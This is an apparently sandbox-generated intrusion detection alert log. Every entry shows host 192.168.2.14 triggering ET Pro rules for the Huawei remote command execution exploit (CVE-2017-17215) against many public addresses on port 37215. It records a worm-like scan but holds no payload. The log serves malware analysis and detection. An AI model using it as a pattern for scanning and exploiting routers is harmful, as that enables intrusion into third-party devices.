                                                        06/13/24-21:33:15.275591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3316837215192.168.2.14197.16.89.214
                                                        06/13/24-21:32:32.170353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012037215192.168.2.14197.32.126.9
                                                        06/13/24-21:32:36.263396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200237215192.168.2.14156.138.47.210
                                                        06/13/24-21:32:56.755802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5872237215192.168.2.14197.121.42.2
                                                        06/13/24-21:32:17.676900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5760437215192.168.2.14156.159.161.192
                                                        06/13/24-21:32:28.028773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878237215192.168.2.1441.194.65.120
                                                        06/13/24-21:33:02.908139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5457637215192.168.2.14197.185.246.102
                                                        06/13/24-21:32:09.440141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958237215192.168.2.14197.128.203.233
                                                        06/13/24-21:32:38.302594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842837215192.168.2.14156.126.29.214
                                                        06/13/24-21:32:21.783485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5582037215192.168.2.14197.227.33.70
                                                        06/13/24-21:32:01.219216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133437215192.168.2.1441.183.243.254
                                                        06/13/24-21:32:40.373687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4182237215192.168.2.14197.95.93.109
                                                        06/13/24-21:32:50.614838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3765637215192.168.2.1441.70.73.132
                                                        06/13/24-21:32:21.782655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5085437215192.168.2.1441.242.185.34
                                                        06/13/24-21:33:04.992917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267437215192.168.2.14197.232.209.217
                                                        06/13/24-21:32:01.246155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174037215192.168.2.14197.41.141.210
                                                        06/13/24-21:32:09.439621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586437215192.168.2.1441.136.162.222
                                                        06/13/24-21:32:30.075040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435637215192.168.2.14197.105.110.155
                                                        06/13/24-21:31:59.175243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5263837215192.168.2.14156.87.162.197
                                                        06/13/24-21:32:48.570225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984837215192.168.2.1441.168.25.163
                                                        06/13/24-21:32:36.263539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452237215192.168.2.1441.200.104.250
                                                        06/13/24-21:32:58.824107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571637215192.168.2.14197.1.23.134
                                                        06/13/24-21:32:30.074491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811037215192.168.2.14197.9.24.127
                                                        06/13/24-21:32:50.614536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4185437215192.168.2.14197.191.8.47
                                                        06/13/24-21:31:57.130859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267437215192.168.2.14156.211.164.49
                                                        06/13/24-21:33:00.888640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599437215192.168.2.14197.192.30.112
                                                        06/13/24-21:32:28.043442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3897237215192.168.2.14156.105.218.239
                                                        06/13/24-21:32:44.480506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547837215192.168.2.14197.28.231.70
                                                        06/13/24-21:32:19.730094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3791237215192.168.2.14156.18.57.1
                                                        06/13/24-21:32:25.976078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4921237215192.168.2.14156.8.0.47
                                                        06/13/24-21:33:07.056746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080437215192.168.2.14197.27.239.219
                                                        06/13/24-21:32:03.299440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4503437215192.168.2.1441.183.64.86
                                                        06/13/24-21:32:09.452994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285637215192.168.2.14156.193.162.34
                                                        06/13/24-21:33:11.157314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370237215192.168.2.14156.95.246.149
                                                        06/13/24-21:33:02.908057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662637215192.168.2.14156.96.246.20
                                                        06/13/24-21:32:50.612691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6039637215192.168.2.1441.9.16.230
                                                        06/13/24-21:32:38.317072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473037215192.168.2.14156.143.179.234
                                                        06/13/24-21:33:02.913124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636037215192.168.2.14156.43.53.115
                                                        06/13/24-21:32:40.373058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409037215192.168.2.14197.198.70.156
                                                        06/13/24-21:32:42.419532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052037215192.168.2.1441.132.167.5
                                                        06/13/24-21:32:17.695455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4281037215192.168.2.14156.214.240.122
                                                        06/13/24-21:32:34.217642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210037215192.168.2.1441.196.115.145
                                                        06/13/24-21:32:54.708924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3494437215192.168.2.14156.152.160.154
                                                        06/13/24-21:32:46.503695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3601237215192.168.2.14197.30.21.153
                                                        06/13/24-21:32:44.453739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5389437215192.168.2.14197.28.33.244
                                                        06/13/24-21:32:48.553699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426637215192.168.2.14156.151.253.58
                                                        06/13/24-21:33:13.227465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5749437215192.168.2.14197.155.120.51
                                                        06/13/24-21:32:46.508007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792037215192.168.2.1441.5.204.62
                                                        06/13/24-21:33:15.275646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4241837215192.168.2.14156.98.154.218
                                                        06/13/24-21:32:07.417869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738437215192.168.2.14156.214.208.156
                                                        06/13/24-21:33:07.060356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976837215192.168.2.14197.198.161.186
                                                        06/13/24-21:32:05.347080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146437215192.168.2.1441.241.2.141
                                                        06/13/24-21:32:46.503202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743237215192.168.2.1441.129.170.139
                                                        06/13/24-21:32:56.788753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494837215192.168.2.14197.180.38.130
                                                        06/13/24-21:32:52.654163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182037215192.168.2.1441.15.85.46
                                                        06/13/24-21:32:56.756560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490037215192.168.2.1441.141.200.181
                                                        06/13/24-21:33:17.308669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800437215192.168.2.14156.186.103.127
                                                        06/13/24-21:32:30.074588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000237215192.168.2.14197.220.102.96
                                                        06/13/24-21:32:03.273816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431837215192.168.2.1441.108.76.82
                                                        06/13/24-21:32:09.439794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4892237215192.168.2.14156.109.89.41
                                                        06/13/24-21:33:09.089484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635637215192.168.2.14156.218.49.73
                                                        06/13/24-21:33:13.227164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823637215192.168.2.14156.108.237.11
                                                        06/13/24-21:31:59.198846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971837215192.168.2.14197.221.63.142
                                                        06/13/24-21:33:00.867218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197637215192.168.2.14197.219.43.166
                                                        06/13/24-21:32:48.551314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316037215192.168.2.1441.203.68.145
                                                        06/13/24-21:32:15.629144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754637215192.168.2.14156.97.101.152
                                                        06/13/24-21:33:07.040496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465237215192.168.2.1441.84.40.124
                                                        06/13/24-21:32:11.487194TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371237215192.168.2.1441.89.95.90
                                                        06/13/24-21:33:15.274687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871837215192.168.2.14156.67.84.212
                                                        06/13/24-21:33:05.011222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482437215192.168.2.14197.18.7.230
                                                        06/13/24-21:32:03.279503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4187037215192.168.2.1441.153.95.121
                                                        06/13/24-21:32:34.215297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630437215192.168.2.14156.251.199.240
                                                        06/13/24-21:32:32.153934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4518837215192.168.2.1441.45.29.43
                                                        06/13/24-21:32:28.046214TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322437215192.168.2.14156.5.40.42
                                                        06/13/24-21:32:13.545229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4936237215192.168.2.1441.115.239.222
                                                        06/13/24-21:32:05.343586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632837215192.168.2.14197.127.21.54
                                                        06/13/24-21:32:28.023603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174837215192.168.2.14156.94.27.179
                                                        06/13/24-21:32:38.321551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302237215192.168.2.14156.169.167.250
                                                        06/13/24-21:32:13.567990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777837215192.168.2.14156.71.51.28
                                                        06/13/24-21:32:17.694481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444637215192.168.2.14197.203.172.88
                                                        06/13/24-21:33:09.111308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276837215192.168.2.14197.184.211.34
                                                        06/13/24-21:33:07.057492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497437215192.168.2.14156.11.128.80
                                                        06/13/24-21:31:57.132358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716237215192.168.2.14197.37.22.33
                                                        06/13/24-21:33:09.090283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215037215192.168.2.1441.179.153.169
                                                        06/13/24-21:32:44.477207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4475637215192.168.2.14156.219.79.55
                                                        06/13/24-21:31:57.093899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5191637215192.168.2.14197.214.25.244
                                                        06/13/24-21:32:19.731810TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857637215192.168.2.14156.114.125.216
                                                        06/13/24-21:33:07.042663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213037215192.168.2.1441.240.110.202
                                                        06/13/24-21:32:42.422231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985837215192.168.2.14197.235.207.253
                                                        06/13/24-21:32:13.543324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199037215192.168.2.14197.98.100.249
                                                        06/13/24-21:32:23.836763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940437215192.168.2.14156.109.89.163
                                                        06/13/24-21:32:07.419958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745637215192.168.2.14156.243.173.68
                                                        06/13/24-21:32:52.654484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019437215192.168.2.1441.204.102.126
                                                        06/13/24-21:32:09.438887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3360637215192.168.2.14197.178.224.197
                                                        06/13/24-21:32:58.844199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376237215192.168.2.1441.186.209.155
                                                        06/13/24-21:33:09.111254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089037215192.168.2.1441.71.169.223
                                                        06/13/24-21:32:58.839021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856437215192.168.2.14156.239.77.184
                                                        06/13/24-21:32:28.025384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511637215192.168.2.1441.193.198.53
                                                        06/13/24-21:32:40.374801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854237215192.168.2.14156.221.200.81
                                                        06/13/24-21:32:05.344134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972837215192.168.2.14197.166.134.148
                                                        06/13/24-21:32:42.423346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5946037215192.168.2.14197.228.61.6
                                                        06/13/24-21:32:09.457346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019237215192.168.2.1441.103.32.153
                                                        06/13/24-21:32:48.569090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302637215192.168.2.1441.60.47.158
                                                        06/13/24-21:33:00.884969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826037215192.168.2.14197.82.146.150
                                                        06/13/24-21:32:05.347545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029837215192.168.2.14156.241.249.90
                                                        06/13/24-21:32:05.370310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332437215192.168.2.14156.59.137.112
                                                        06/13/24-21:33:13.213693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439437215192.168.2.14156.128.54.41
                                                        06/13/24-21:33:13.214345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076037215192.168.2.14156.190.21.155
                                                        06/13/24-21:33:11.159049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529437215192.168.2.14156.216.246.93
                                                        06/13/24-21:33:11.156147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553037215192.168.2.14197.190.225.126
                                                        06/13/24-21:31:57.092203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028437215192.168.2.1441.8.213.120
                                                        06/13/24-21:32:50.614580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4859437215192.168.2.14197.231.178.217
                                                        06/13/24-21:32:40.359645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789437215192.168.2.14197.166.149.84
                                                        06/13/24-21:32:17.697027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572437215192.168.2.1441.17.114.141
                                                        06/13/24-21:32:56.786905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3724037215192.168.2.1441.199.253.1
                                                        06/13/24-21:33:09.112128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448637215192.168.2.14197.65.235.142
                                                        06/13/24-21:31:57.132565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5569437215192.168.2.1441.58.29.177
                                                        06/13/24-21:32:07.400927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061237215192.168.2.1441.246.180.234
                                                        06/13/24-21:32:30.077066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6015037215192.168.2.14197.228.87.126
                                                        06/13/24-21:32:30.101227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092637215192.168.2.14156.154.120.130
                                                        06/13/24-21:32:28.043888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071637215192.168.2.1441.6.207.59
                                                        06/13/24-21:32:42.419079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363637215192.168.2.1441.40.143.143
                                                        06/13/24-21:32:15.611448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153237215192.168.2.1441.99.220.93
                                                        06/13/24-21:32:52.669304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411037215192.168.2.1441.27.46.43
                                                        06/13/24-21:32:13.543107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794637215192.168.2.14197.38.47.48
                                                        06/13/24-21:32:42.417688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140237215192.168.2.14197.152.157.50
                                                        06/13/24-21:32:05.347396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939637215192.168.2.14197.17.178.219
                                                        06/13/24-21:32:34.212901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817637215192.168.2.1441.74.208.178
                                                        06/13/24-21:33:05.010880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614637215192.168.2.1441.22.41.86
                                                        06/13/24-21:32:03.277722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4676837215192.168.2.14197.137.20.236
                                                        06/13/24-21:33:11.160237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454837215192.168.2.14156.190.207.57
                                                        06/13/24-21:32:30.128352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4215437215192.168.2.14156.87.207.164
                                                        06/13/24-21:33:02.914690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373037215192.168.2.14197.219.204.1
                                                        06/13/24-21:32:30.124694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5783837215192.168.2.14197.20.31.125
                                                        06/13/24-21:33:00.869670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975637215192.168.2.1441.29.82.94
                                                        06/13/24-21:32:50.611985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750637215192.168.2.1441.73.53.201
                                                        06/13/24-21:31:57.091621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026437215192.168.2.14156.73.77.88
                                                        06/13/24-21:32:46.502934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756637215192.168.2.14156.97.164.14
                                                        06/13/24-21:32:23.943211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4078637215192.168.2.14197.212.204.133
                                                        06/13/24-21:32:05.346146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529437215192.168.2.14156.227.149.193
                                                        06/13/24-21:33:13.229335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941837215192.168.2.14156.190.64.80
                                                        06/13/24-21:32:28.048811TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304237215192.168.2.1441.5.80.66
                                                        06/13/24-21:32:48.550845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708437215192.168.2.14197.87.9.197
                                                        06/13/24-21:32:48.553888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980037215192.168.2.1441.58.64.4
                                                        06/13/24-21:32:50.612240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005437215192.168.2.1441.236.66.125
                                                        06/13/24-21:32:13.544580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030237215192.168.2.1441.73.49.33
                                                        06/13/24-21:32:36.243418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741437215192.168.2.1441.39.72.162
                                                        06/13/24-21:33:00.887289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929037215192.168.2.1441.34.93.145
                                                        06/13/24-21:32:50.631090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5617037215192.168.2.14197.173.217.70
                                                        06/13/24-21:33:17.310479TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357037215192.168.2.14197.200.114.202
                                                        06/13/24-21:32:46.509981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4009437215192.168.2.1441.178.118.83
                                                        06/13/24-21:32:58.839077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4236837215192.168.2.14197.45.45.28
                                                        06/13/24-21:32:09.436639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4245437215192.168.2.14156.240.62.32
                                                        06/13/24-21:32:30.127966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797637215192.168.2.1441.174.141.139
                                                        06/13/24-21:32:50.610981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348237215192.168.2.14156.188.207.68
                                                        06/13/24-21:32:54.710092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835837215192.168.2.14156.232.235.124
                                                        06/13/24-21:31:57.093048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768837215192.168.2.14156.251.245.149
                                                        06/13/24-21:32:23.831839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559637215192.168.2.1441.225.224.218
                                                        06/13/24-21:33:09.085844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3579037215192.168.2.14156.24.200.224
                                                        06/13/24-21:32:03.308849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222237215192.168.2.1441.21.115.126
                                                        06/13/24-21:32:36.265969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5464037215192.168.2.14156.48.52.5
                                                        06/13/24-21:33:11.159139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510237215192.168.2.14197.32.79.97
                                                        06/13/24-21:33:13.230550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826837215192.168.2.1441.48.159.130
                                                        06/13/24-21:32:40.376251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894037215192.168.2.1441.214.136.118
                                                        06/13/24-21:32:07.415950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889437215192.168.2.14156.144.116.14
                                                        06/13/24-21:32:25.970410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222237215192.168.2.14156.184.20.185
                                                        06/13/24-21:32:17.671251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895837215192.168.2.1441.195.208.167
                                                        06/13/24-21:33:09.088859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138237215192.168.2.14156.171.42.224
                                                        06/13/24-21:32:34.194354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4783637215192.168.2.14197.205.68.66
                                                        06/13/24-21:33:15.257672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317437215192.168.2.1441.252.105.48
                                                        06/13/24-21:32:40.354814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358237215192.168.2.14156.9.67.66
                                                        06/13/24-21:32:30.127246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534437215192.168.2.14197.88.156.102
                                                        06/13/24-21:31:59.177813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845037215192.168.2.14156.238.222.107
                                                        06/13/24-21:32:17.676538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797637215192.168.2.1441.89.243.202
                                                        06/13/24-21:32:19.731259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445037215192.168.2.14197.239.151.250
                                                        06/13/24-21:32:56.784572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599437215192.168.2.1441.189.233.238
                                                        06/13/24-21:33:11.159177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130237215192.168.2.14156.18.209.103
                                                        06/13/24-21:32:38.300909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003037215192.168.2.14197.51.31.56
                                                        06/13/24-21:32:15.610959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5539437215192.168.2.14197.216.132.168
                                                        06/13/24-21:32:32.154550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264437215192.168.2.14197.19.67.41
                                                        06/13/24-21:32:40.377302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542437215192.168.2.1441.197.115.118
                                                        06/13/24-21:32:32.167797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854837215192.168.2.14156.143.243.85
                                                        06/13/24-21:33:11.173077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992637215192.168.2.14156.131.241.204
                                                        06/13/24-21:32:11.488718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3836237215192.168.2.1441.224.141.21
                                                        06/13/24-21:33:07.056832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3389237215192.168.2.1441.21.109.98
                                                        06/13/24-21:32:13.569083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035837215192.168.2.1441.11.36.74
